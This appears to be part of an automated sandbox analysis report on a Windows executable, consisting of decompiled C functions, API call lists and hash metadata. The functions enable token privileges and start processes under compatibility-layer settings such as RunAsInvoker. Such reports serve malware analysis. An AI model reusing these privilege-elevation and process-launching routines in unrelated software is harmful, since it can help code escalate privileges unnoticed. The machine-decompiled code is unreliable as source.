                                                                                                                                                                                                                          					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
                                                                                                                                                                                                                          					__eflags = _t22;
                                                                                                                                                                                                                          					if(_t22 != 0) {
                                                                                                                                                                                                                          						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t19 = GetLastError();
                                                                                                                                                                                                                          				FindCloseChangeNotification(_v8); // executed
                                                                                                                                                                                                                          				return _t19;
                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                                                                                                                            • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                                                                                                                                          • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                                                                                                                                          • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                                                                                                                                          • API String ID: 616250965-1253513912
                                                                                                                                                                                                                          • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                                                                                                                          • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                          			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
                                                                                                                                                                                                                          				WCHAR* _v8;
                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                          				char* _v24;
                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                          				int _v36;
                                                                                                                                                                                                                          				int _v40;
                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                          				void* _v56;
                                                                                                                                                                                                                          				int _v60;
                                                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                                                          				void _v122;
                                                                                                                                                                                                                          				int _v124;
                                                                                                                                                                                                                          				short _v148;
                                                                                                                                                                                                                          				signed int _v152;
                                                                                                                                                                                                                          				intOrPtr _v168;
                                                                                                                                                                                                                          				intOrPtr _v172;
                                                                                                                                                                                                                          				intOrPtr _v176;
                                                                                                                                                                                                                          				intOrPtr _v180;
                                                                                                                                                                                                                          				void _v192;
                                                                                                                                                                                                                          				char _v196;
                                                                                                                                                                                                                          				char _v228;
                                                                                                                                                                                                                          				void _v258;
                                                                                                                                                                                                                          				int _v260;
                                                                                                                                                                                                                          				void _v786;
                                                                                                                                                                                                                          				short _v788;
                                                                                                                                                                                                                          				void _v1314;
                                                                                                                                                                                                                          				short _v1316;
                                                                                                                                                                                                                          				void _v1842;
                                                                                                                                                                                                                          				short _v1844;
                                                                                                                                                                                                                          				void _v18234;
                                                                                                                                                                                                                          				short _v18236;
                                                                                                                                                                                                                          				char _v83772;
                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				short* _t174;
                                                                                                                                                                                                                          				short _t175;
                                                                                                                                                                                                                          				signed int _t176;
                                                                                                                                                                                                                          				short _t177;
                                                                                                                                                                                                                          				short _t178;
                                                                                                                                                                                                                          				int _t184;
                                                                                                                                                                                                                          				signed int _t187;
                                                                                                                                                                                                                          				intOrPtr _t207;
                                                                                                                                                                                                                          				intOrPtr _t219;
                                                                                                                                                                                                                          				int* _t252;
                                                                                                                                                                                                                          				int* _t253;
                                                                                                                                                                                                                          				int* _t266;
                                                                                                                                                                                                                          				int* _t267;
                                                                                                                                                                                                                          				wchar_t* _t270;
                                                                                                                                                                                                                          				int _t286;
                                                                                                                                                                                                                          				void* _t292;
                                                                                                                                                                                                                          				void* _t304;
                                                                                                                                                                                                                          				WCHAR* _t308;
                                                                                                                                                                                                                          				WCHAR* _t310;
                                                                                                                                                                                                                          				intOrPtr* _t311;
                                                                                                                                                                                                                          				int _t312;
                                                                                                                                                                                                                          				WCHAR* _t315;
                                                                                                                                                                                                                          				void* _t325;
                                                                                                                                                                                                                          				void* _t328;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t304 = __edx;
                                                                                                                                                                                                                          				E0040B550(0x1473c, __ecx);
                                                                                                                                                                                                                          				_t286 = 0;
                                                                                                                                                                                                                          				 *_a4 = 0;
                                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                          				memset( &_v192, 0, 0x40);
                                                                                                                                                                                                                          				_v60 = 0;
                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                                          				_v40 = 0;
                                                                                                                                                                                                                          				_v28 = 0;
                                                                                                                                                                                                                          				_v36 = 0;
                                                                                                                                                                                                                          				_v32 = 0x100;
                                                                                                                                                                                                                          				_v44 = 0;
                                                                                                                                                                                                                          				_v1316 = 0;
                                                                                                                                                                                                                          				memset( &_v1314, 0, 0x208);
                                                                                                                                                                                                                          				_v788 = 0;
                                                                                                                                                                                                                          				memset( &_v786, 0, 0x208);
                                                                                                                                                                                                                          				_t315 = _a8;
                                                                                                                                                                                                                          				_t328 = _t325 + 0x24;
                                                                                                                                                                                                                          				_v83772 = 0;
                                                                                                                                                                                                                          				_v196 = 0x44;
                                                                                                                                                                                                                          				E00404923(0x104,  &_v788, _t315);
                                                                                                                                                                                                                          				if(wcschr(_t315, 0x25) != 0) {
                                                                                                                                                                                                                          					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
                                                                                                                                                                                                                          					_v8 = _t286;
                                                                                                                                                                                                                          					_v1844 = _t286;
                                                                                                                                                                                                                          					memset( &_v1842, _t286, 0x208);
                                                                                                                                                                                                                          					_t328 = _t328 + 0xc;
                                                                                                                                                                                                                          					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
                                                                                                                                                                                                                          					if(_v1844 != _t286) {
                                                                                                                                                                                                                          						E00404923(0x104,  &_v788,  &_v1844);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t308 =  &(_t315[0x2106]);
                                                                                                                                                                                                                          				if( *_t308 == _t286) {
                                                                                                                                                                                                                          					E00404B5C( &_v1316,  &_v788);
                                                                                                                                                                                                                          					__eflags = _v1316 - _t286;
                                                                                                                                                                                                                          					_t315 = _a8;
                                                                                                                                                                                                                          					_pop(_t292);
                                                                                                                                                                                                                          					if(_v1316 == _t286) {
                                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					goto L10;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_v20 = _t308;
                                                                                                                                                                                                                          					_t270 = wcschr(_t308, 0x25);
                                                                                                                                                                                                                          					_pop(_t292);
                                                                                                                                                                                                                          					if(_t270 == 0) {
                                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                                          						_t174 =  &(_t315[0x220e]);
                                                                                                                                                                                                                          						if( *_t174 != 1) {
                                                                                                                                                                                                                          							_v152 = _v152 | 0x00000001;
                                                                                                                                                                                                                          							_v148 =  *_t174;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t309 = ",";
                                                                                                                                                                                                                          						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
                                                                                                                                                                                                                          							_v260 = _t286;
                                                                                                                                                                                                                          							memset( &_v258, _t286, 0x3e);
                                                                                                                                                                                                                          							_v124 = _t286;
                                                                                                                                                                                                                          							memset( &_v122, _t286, 0x3e);
                                                                                                                                                                                                                          							_v8 = _t286;
                                                                                                                                                                                                                          							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
                                                                                                                                                                                                                          							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
                                                                                                                                                                                                                          							_v152 = _v152 | 0x00000004;
                                                                                                                                                                                                                          							_t266 =  &_v260;
                                                                                                                                                                                                                          							_push(_t266);
                                                                                                                                                                                                                          							L0040B1F8();
                                                                                                                                                                                                                          							_v180 = _t266;
                                                                                                                                                                                                                          							_t328 = _t328 + 0x3c;
                                                                                                                                                                                                                          							_t267 =  &_v124;
                                                                                                                                                                                                                          							L0040B1F8();
                                                                                                                                                                                                                          							_t292 = _t267;
                                                                                                                                                                                                                          							_v176 = _t267;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
                                                                                                                                                                                                                          							_v260 = _t286;
                                                                                                                                                                                                                          							memset( &_v258, _t286, 0x3e);
                                                                                                                                                                                                                          							_v124 = _t286;
                                                                                                                                                                                                                          							memset( &_v122, _t286, 0x3e);
                                                                                                                                                                                                                          							_v8 = _t286;
                                                                                                                                                                                                                          							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
                                                                                                                                                                                                                          							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
                                                                                                                                                                                                                          							_v152 = _v152 | 0x00000002;
                                                                                                                                                                                                                          							_t252 =  &_v260;
                                                                                                                                                                                                                          							_push(_t252);
                                                                                                                                                                                                                          							L0040B1F8();
                                                                                                                                                                                                                          							_v172 = _t252;
                                                                                                                                                                                                                          							_t328 = _t328 + 0x3c;
                                                                                                                                                                                                                          							_t253 =  &_v124;
                                                                                                                                                                                                                          							_push(_t253);
                                                                                                                                                                                                                          							L0040B1F8();
                                                                                                                                                                                                                          							_v168 = _t253;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t310 =  &(_t315[0x105]);
                                                                                                                                                                                                                          						if( *_t310 != _t286) {
                                                                                                                                                                                                                          							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
                                                                                                                                                                                                                          								_push(_t310);
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								_v18236 = _t286;
                                                                                                                                                                                                                          								memset( &_v18234, _t286, 0x4000);
                                                                                                                                                                                                                          								_t328 = _t328 + 0xc;
                                                                                                                                                                                                                          								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
                                                                                                                                                                                                                          								_push( &_v18236);
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							_push( &_v788);
                                                                                                                                                                                                                          							_push(L"\"%s\" %s");
                                                                                                                                                                                                                          							_push(0x7fff);
                                                                                                                                                                                                                          							_push( &_v83772);
                                                                                                                                                                                                                          							L0040B1EC();
                                                                                                                                                                                                                          							_v24 =  &_v83772;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t175 = _t315[0x220c];
                                                                                                                                                                                                                          						if(_t175 != 0x20) {
                                                                                                                                                                                                                          							_v12 = _t175;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t311 = _a4;
                                                                                                                                                                                                                          						if(_t315[0x2254] == 2) {
                                                                                                                                                                                                                          							E00401D1E(_t311, L"RunAsInvoker");
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t176 = _t315[0x265c];
                                                                                                                                                                                                                          						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
                                                                                                                                                                                                                          							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t177 = _t315[0x265e];
                                                                                                                                                                                                                          						if(_t177 != 1) {
                                                                                                                                                                                                                          							__eflags = _t177 - 2;
                                                                                                                                                                                                                          							if(_t177 != 2) {
                                                                                                                                                                                                                          								goto L37;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							_push(L"16BITCOLOR");
                                                                                                                                                                                                                          							goto L36;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_push(L"256COLOR");
                                                                                                                                                                                                                          							L36:
                                                                                                                                                                                                                          							E00401D1E(_t311);
                                                                                                                                                                                                                          							L37:
                                                                                                                                                                                                                          							if(_t315[0x2660] == _t286) {
                                                                                                                                                                                                                          								__eflags = _t315[0x2662] - _t286;
                                                                                                                                                                                                                          								if(_t315[0x2662] == _t286) {
                                                                                                                                                                                                                          									__eflags = _t315[0x2664] - _t286;
                                                                                                                                                                                                                          									if(_t315[0x2664] == _t286) {
                                                                                                                                                                                                                          										__eflags = _t315[0x2666] - _t286;
                                                                                                                                                                                                                          										if(_t315[0x2666] == _t286) {
                                                                                                                                                                                                                          											L46:
                                                                                                                                                                                                                          											_t178 = _t315[0x2a6e];
                                                                                                                                                                                                                          											_t358 = _t178 - 3;
                                                                                                                                                                                                                          											if(_t178 != 3) {
                                                                                                                                                                                                                          												__eflags = _t178 - 2;
                                                                                                                                                                                                                          												if(_t178 != 2) {
                                                                                                                                                                                                                          													__eflags =  *_t311 - _t286;
                                                                                                                                                                                                                          													if( *_t311 == _t286) {
                                                                                                                                                                                                                          														_push(_t286);
                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                          														_push(_t311);
                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                          													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
                                                                                                                                                                                                                          													L63:
                                                                                                                                                                                                                          													_t293 = _t311;
                                                                                                                                                                                                                          													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
                                                                                                                                                                                                                          													_t312 = _t184;
                                                                                                                                                                                                                          													if(_t312 == _t286 && _v60 != _t286) {
                                                                                                                                                                                                                          														_t363 = _t315[0x266c] - _t286;
                                                                                                                                                                                                                          														if(_t315[0x266c] != _t286) {
                                                                                                                                                                                                                          															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
                                                                                                                                                                                                                          															_a4 = _a4 | 0xffffffff;
                                                                                                                                                                                                                          															_a8 = _t286;
                                                                                                                                                                                                                          															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
                                                                                                                                                                                                                          															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                          													E004055D1(_t184,  &_v44);
                                                                                                                                                                                                                          													return _t312;
                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                          												E00405497( &_v92);
                                                                                                                                                                                                                          												E00405497( &_v228);
                                                                                                                                                                                                                          												E0040149F(__eflags,  &_v92);
                                                                                                                                                                                                                          												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
                                                                                                                                                                                                                          												E00401551( &_v228, _t304, __eflags,  &_v92);
                                                                                                                                                                                                                          												_t204 = _a4;
                                                                                                                                                                                                                          												__eflags =  *_a4;
                                                                                                                                                                                                                          												if(__eflags != 0) {
                                                                                                                                                                                                                          													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                          												E00401421( &_v44, _t304,  &_v92, __eflags);
                                                                                                                                                                                                                          												_t207 = _v28;
                                                                                                                                                                                                                          												__eflags = _t207;
                                                                                                                                                                                                                          												_v16 = 0x40c4e8;
                                                                                                                                                                                                                          												if(_t207 != 0) {
                                                                                                                                                                                                                          													_v16 = _t207;
                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                          												_v12 = _v12 | 0x00000400;
                                                                                                                                                                                                                          												E004054B9( &_v228);
                                                                                                                                                                                                                          												E004054B9( &_v92);
                                                                                                                                                                                                                          												_t286 = 0;
                                                                                                                                                                                                                          												__eflags = 0;
                                                                                                                                                                                                                          												L58:
                                                                                                                                                                                                                          												_t315 = _a8;
                                                                                                                                                                                                                          												_t311 = _a4;
                                                                                                                                                                                                                          												goto L63;
                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                          											E00405497( &_v92);
                                                                                                                                                                                                                          											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
                                                                                                                                                                                                                          											_t359 =  *_t311 - _t286;
                                                                                                                                                                                                                          											if( *_t311 != _t286) {
                                                                                                                                                                                                                          												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                          											E00401421( &_v44, _t304,  &_v92, _t359);
                                                                                                                                                                                                                          											_t219 = _v28;
                                                                                                                                                                                                                          											_v16 = 0x40c4e8;
                                                                                                                                                                                                                          											if(_t219 != _t286) {
                                                                                                                                                                                                                          												_v16 = _t219;
                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                          											_v12 = _v12 | 0x00000400;
                                                                                                                                                                                                                          											E004054B9( &_v92);
                                                                                                                                                                                                                          											goto L58;
                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                          										_push(L"HIGHDPIAWARE");
                                                                                                                                                                                                                          										L45:
                                                                                                                                                                                                                          										E00401D1E(_t311);
                                                                                                                                                                                                                          										goto L46;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          									_push(L"DISABLEDWM");
                                                                                                                                                                                                                          									goto L45;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								_push(L"DISABLETHEMES");
                                                                                                                                                                                                                          								goto L45;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							_push(L"640X480");
                                                                                                                                                                                                                          							goto L45;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
                                                                                                                                                                                                                          					L10:
                                                                                                                                                                                                                          					_v20 =  &_v1316;
                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}

































































                                                                                                                                                                                                                          0x00402593
                                                                                                                                                                                                                          0x004025a9
                                                                                                                                                                                                                          0x004025ae
                                                                                                                                                                                                                          0x004025b5
                                                                                                                                                                                                                          0x004025bb
                                                                                                                                                                                                                          0x004025bc
                                                                                                                                                                                                                          0x004025c1
                                                                                                                                                                                                                          0x004025c7
                                                                                                                                                                                                                          0x004025ca
                                                                                                                                                                                                                          0x004025cd
                                                                                                                                                                                                                          0x004025ce
                                                                                                                                                                                                                          0x004025d4
                                                                                                                                                                                                                          0x004025d4
                                                                                                                                                                                                                          0x004025da
                                                                                                                                                                                                                          0x004025e3
                                                                                                                                                                                                                          0x004025eb
                                                                                                                                                                                                                          0x00402633
                                                                                                                                                                                                                          0x004025fb
                                                                                                                                                                                                                          0x00402608
                                                                                                                                                                                                                          0x0040260f
                                                                                                                                                                                                                          0x00402614
                                                                                                                                                                                                                          0x00402624
                                                                                                                                                                                                                          0x00402630
                                                                                                                                                                                                                          0x00402630
                                                                                                                                                                                                                          0x0040263a
                                                                                                                                                                                                                          0x0040263b
                                                                                                                                                                                                                          0x00402646
                                                                                                                                                                                                                          0x0040264b
                                                                                                                                                                                                                          0x0040264c
                                                                                                                                                                                                                          0x0040265a
                                                                                                                                                                                                                          0x0040265a
                                                                                                                                                                                                                          0x0040265d
                                                                                                                                                                                                                          0x00402666
                                                                                                                                                                                                                          0x00402668
                                                                                                                                                                                                                          0x00402668
                                                                                                                                                                                                                          0x00402672
                                                                                                                                                                                                                          0x00402675
                                                                                                                                                                                                                          0x0040267e
                                                                                                                                                                                                                          0x0040267e
                                                                                                                                                                                                                          0x00402683
                                                                                                                                                                                                                          0x0040268b
                                                                                                                                                                                                                          0x0040269e
                                                                                                                                                                                                                          0x0040269e
                                                                                                                                                                                                                          0x004026a3
                                                                                                                                                                                                                          0x004026ac
                                                                                                                                                                                                                          0x004026b5
                                                                                                                                                                                                                          0x004026b8
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004026ba
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004026ae
                                                                                                                                                                                                                          0x004026ae
                                                                                                                                                                                                                          0x004026bf
                                                                                                                                                                                                                          0x004026c1
                                                                                                                                                                                                                          0x004026c6
                                                                                                                                                                                                                          0x004026cc
                                                                                                                                                                                                                          0x004026d5
                                                                                                                                                                                                                          0x004026db
                                                                                                                                                                                                                          0x004026e4
                                                                                                                                                                                                                          0x004026ea
                                                                                                                                                                                                                          0x004026f3
                                                                                                                                                                                                                          0x004026f9
                                                                                                                                                                                                                          0x00402707
                                                                                                                                                                                                                          0x00402707
                                                                                                                                                                                                                          0x0040270d
                                                                                                                                                                                                                          0x00402710
                                                                                                                                                                                                                          0x0040276d
                                                                                                                                                                                                                          0x00402770
                                                                                                                                                                                                                          0x0040280b
                                                                                                                                                                                                                          0x0040280e
                                                                                                                                                                                                                          0x00402813
                                                                                                                                                                                                                          0x00402810
                                                                                                                                                                                                                          0x00402810
                                                                                                                                                                                                                          0x00402810
                                                                                                                                                                                                                          0x00402819
                                                                                                                                                                                                                          0x0040281f
                                                                                                                                                                                                                          0x00402836
                                                                                                                                                                                                                          0x00402841
                                                                                                                                                                                                                          0x00402846
                                                                                                                                                                                                                          0x0040284a
                                                                                                                                                                                                                          0x00402851
                                                                                                                                                                                                                          0x00402857
                                                                                                                                                                                                                          0x00402860
                                                                                                                                                                                                                          0x00402865
                                                                                                                                                                                                                          0x00402876
                                                                                                                                                                                                                          0x00402879
                                                                                                                                                                                                                          0x00402888
                                                                                                                                                                                                                          0x00402888
                                                                                                                                                                                                                          0x00402857
                                                                                                                                                                                                                          0x00402891
                                                                                                                                                                                                                          0x0040289c
                                                                                                                                                                                                                          0x0040289c
                                                                                                                                                                                                                          0x00402779
                                                                                                                                                                                                                          0x00402784
                                                                                                                                                                                                                          0x0040278d
                                                                                                                                                                                                                          0x004027a4
                                                                                                                                                                                                                          0x004027b3
                                                                                                                                                                                                                          0x004027b8
                                                                                                                                                                                                                          0x004027bb
                                                                                                                                                                                                                          0x004027bf
                                                                                                                                                                                                                          0x004027c6
                                                                                                                                                                                                                          0x004027c6
                                                                                                                                                                                                                          0x004027d1
                                                                                                                                                                                                                          0x004027d6
                                                                                                                                                                                                                          0x004027d9
                                                                                                                                                                                                                          0x004027db
                                                                                                                                                                                                                          0x004027e2
                                                                                                                                                                                                                          0x004027e4
                                                                                                                                                                                                                          0x004027e4
                                                                                                                                                                                                                          0x004027e7
                                                                                                                                                                                                                          0x004027f4
                                                                                                                                                                                                                          0x004027fc
                                                                                                                                                                                                                          0x00402801
                                                                                                                                                                                                                          0x00402801
                                                                                                                                                                                                                          0x00402803
                                                                                                                                                                                                                          0x00402803
                                                                                                                                                                                                                          0x00402806
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402806
                                                                                                                                                                                                                          0x00402715
                                                                                                                                                                                                                          0x00402729

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402300
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040233E
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402356
                                                                                                                                                                                                                            • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                                                                            • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00402387
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                                                                                                                                            • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                                                                                                                                            • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 004023B7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004023D9
                                                                                                                                                                                                                          • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040242B
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004024BE
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004024D1
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 00402519
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 0040252B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402561
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402574
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 004025BC
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 004025CE
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 004025F0
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040260F
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040264C
                                                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                                                                                                                                          • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                                                                                                                                                          • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                                                                                                                                          • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                                                                                                                                          • API String ID: 2452314994-435178042
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                          			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
                                                                                                                                                                                                                          				char _v0;
                                                                                                                                                                                                                          				WCHAR* _v4;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                          				void* _t82;
                                                                                                                                                                                                                          				wchar_t* _t85;
                                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                                          				void* _t87;
                                                                                                                                                                                                                          				intOrPtr _t92;
                                                                                                                                                                                                                          				wchar_t* _t93;
